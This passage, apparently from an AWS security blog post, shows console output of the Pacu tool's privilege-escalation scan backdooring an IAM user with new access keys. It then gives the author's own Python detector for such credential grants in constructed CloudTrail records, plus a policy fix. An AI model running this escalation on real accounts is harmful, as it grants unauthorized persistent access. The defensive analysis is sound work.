[iam__privesc_scan]   CONFIRMED: AttachGroupPolicy
[iam__privesc_scan]   CONFIRMED: PutUserPolicy
[iam__privesc_scan]   CONFIRMED: PutGroupPolicy
[iam__privesc_scan]   CONFIRMED: AddUserToGroup
[iam__privesc_scan] Attempting confirmed privilege escalation methods...

[iam__privesc_scan]   Starting method CreateNewPolicyVersion...

[iam__privesc_scan]     Is there a specific policy you want to target? Enter its ARN now (just hit enter to automatically figure out a valid policy to target): 
[iam__privesc_scan]     No policy ARN entered, now finding a valid policy...

[iam__privesc_scan]       0 valid group-attached policy(ies) found.

[iam__privesc_scan]       No valid group-attached policies found.
[iam__privesc_scan]     It looks like the current users confirmed permissions have not been enumerated yet, so no valid policy can be found, enter "y" to run the iam__enum_permissions module to enumerate the required information, enter the ARN of a policy to create a new version for, or "n" to skip this privilege escalation module ([policy_arn]/y/n): 
[iam__privesc_scan]   All methods of enumerating a valid policy have failed. Manually enter in a policy ARN to use, or press enter to skip to the next privilege escalation method: 
[iam__privesc_scan]   Method failed. Trying next potential method...
[iam__privesc_scan]   Starting method SetExistingDefaultPolicyVersion...

[iam__privesc_scan]     Is there a specific policy you want to target? Enter its ARN now (just hit enter to automatically figure out a list of valid policies to check): 
[iam__privesc_scan]     No policy ARN entered, now finding a valid policy...

[iam__privesc_scan]   All methods of enumerating a valid policy have failed. Skipping to the next privilege escalation method...

[iam__privesc_scan]   Method failed. Trying next potential method...
[iam__privesc_scan]   Starting method CreateAccessKey...

[iam__privesc_scan]     Is there a specific user you want to target? They must not already have two sets of access keys created for their user. Enter their user name now or just hit enter to enumerate users and view a list of options: 
[iam__privesc_scan] Data (IAM > Users) not found, run module "iam__enum_users_roles_policies_groups" to fetch it? (y/n) y
[iam__privesc_scan]   Running module iam__enum_users_roles_policies_groups...
[iam__enum_users_roles_policies_groups] Found 2 users
[iam__enum_users_roles_policies_groups] iam__enum_users_roles_policies_groups completed.

[iam__enum_users_roles_policies_groups] MODULE SUMMARY:

  2 Users Enumerated
  IAM resources saved in Pacu database.

[iam__privesc_scan] Found 2 user(s). Choose a user below.
[iam__privesc_scan]   [0] Other (Manually enter user name)
[iam__privesc_scan]   [1] pacu
[iam__privesc_scan]   [2] test
[iam__privesc_scan] Choose an option: 2
[iam__privesc_scan]   Running module iam__backdoor_users_keys...
[iam__backdoor_users_keys] Backdoor the following users?
[iam__backdoor_users_keys]   test
[iam__backdoor_users_keys]     Access Key ID: XXXXXX
[iam__backdoor_users_keys]     Secret Key: XXXXXX
[iam__backdoor_users_keys] iam__backdoor_users_keys completed.

[iam__backdoor_users_keys] MODULE SUMMARY:

  1 user key(s) successfully backdoored.


[iam__privesc_scan] iam__privesc_scan completed.

[iam__privesc_scan] MODULE SUMMARY:

  Privilege escalation was successful

Checking in the AWS console confirms that a new access key and secret access key have been added to the test user.

[Screenshot: the AWS console showing the newly added access key for the test user]
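
The key creation shown above leaves a clear trace in CloudTrail: the pacu user calling CreateAccessKey with a different user name in the request parameters. The following is an added example (my own code, not part of Pacu or of the original post) that picks that pattern, and the related CreateLoginProfile/UpdateLoginProfile calls, out of CloudTrail records. The events are constructed to mimic the CloudTrail record layout; the user names, IP addresses and the role ARN are placeholders.

```python
"""Added example (not Pacu's code): detect one IAM principal handing credentials
to a different IAM user in CloudTrail, the pattern the run above produced. The
records are constructed to mimic CloudTrail's field names; nothing was captured
from a real account."""

# eventNames that give someone a new way to authenticate as an IAM user.
CREDENTIAL_GRANTS = {"CreateAccessKey", "CreateLoginProfile", "UpdateLoginProfile"}

SAMPLE_EVENTS = [  # constructed records
    {   # mirrors the run above: user pacu creates keys for user test
        "eventTime": "2022-01-01T00:00:01Z",
        "eventSource": "iam.amazonaws.com",
        "eventName": "CreateAccessKey",
        "userIdentity": {"type": "IAMUser", "userName": "pacu"},
        "requestParameters": {"userName": "test"},
        "sourceIPAddress": "203.0.113.10",
    },
    {   # a user rotating their own key: routine, not an alert
        "eventTime": "2022-01-01T00:00:02Z",
        "eventSource": "iam.amazonaws.com",
        "eventName": "CreateAccessKey",
        "userIdentity": {"type": "IAMUser", "userName": "alice"},
        "requestParameters": {"userName": "alice"},
        "sourceIPAddress": "198.51.100.7",
    },
    {   # no userName parameter: IAM creates the key for the caller itself
        "eventTime": "2022-01-01T00:00:03Z",
        "eventSource": "iam.amazonaws.com",
        "eventName": "CreateAccessKey",
        "userIdentity": {"type": "IAMUser", "userName": "bob"},
        "requestParameters": None,
        "sourceIPAddress": "198.51.100.8",
    },
    {   # read-only call, ignored even though it names another user
        "eventTime": "2022-01-01T00:00:04Z",
        "eventSource": "iam.amazonaws.com",
        "eventName": "GetUser",
        "userIdentity": {"type": "IAMUser", "userName": "pacu"},
        "requestParameters": {"userName": "test"},
        "sourceIPAddress": "203.0.113.10",
    },
    {   # an assumed role setting a console password on an IAM user (placeholder ARN)
        "eventTime": "2022-01-01T00:00:05Z",
        "eventSource": "iam.amazonaws.com",
        "eventName": "CreateLoginProfile",
        "userIdentity": {"type": "AssumedRole",
                         "arn": "arn:aws:sts::123456789012:assumed-role/Admin/ops"},
        "requestParameters": {"userName": "test", "passwordResetRequired": False},
        "sourceIPAddress": "198.51.100.9",
    },
]


def actor_name(identity):
    """Human-readable caller: the IAM user name, else the principal ARN."""
    return identity.get("userName") or identity.get("arn") or "unknown"


def is_cross_principal_grant(event):
    """True when the call hands credentials to a user other than the caller."""
    if event.get("eventSource") != "iam.amazonaws.com":
        return False
    if event.get("eventName") not in CREDENTIAL_GRANTS:
        return False
    params = event.get("requestParameters") or {}
    target = params.get("userName")
    if target is None:
        return False  # an omitted userName means the caller's own user
    identity = event.get("userIdentity", {})
    if identity.get("type") == "IAMUser" and identity.get("userName") == target:
        return False  # self-service key rotation or password change
    return True


def find_credential_grants(events):
    """One alert dict per cross-principal credential grant, in event order."""
    return [
        {
            "time": ev.get("eventTime"),
            "event": ev["eventName"],
            "actor": actor_name(ev.get("userIdentity", {})),
            "target": ev["requestParameters"]["userName"],
            "source_ip": ev.get("sourceIPAddress"),
        }
        for ev in events
        if is_cross_principal_grant(ev)
    ]


if __name__ == "__main__":
    for alert in find_credential_grants(SAMPLE_EVENTS):
        print(f"{alert['time']} {alert['event']}: {alert['actor']} -> "
              f"{alert['target']} from {alert['source_ip']}")
```

Role-based hits will include legitimate administrator activity, so they are worth a lower severity than a plain IAM user granting keys to another user. The preventive control is to restrict iam:CreateAccessKey and the login-profile actions in user policies to the caller's own user (Resource "arn:aws:iam::*:user/${aws:username}"), which is exactly what would have stopped the escalation shown above.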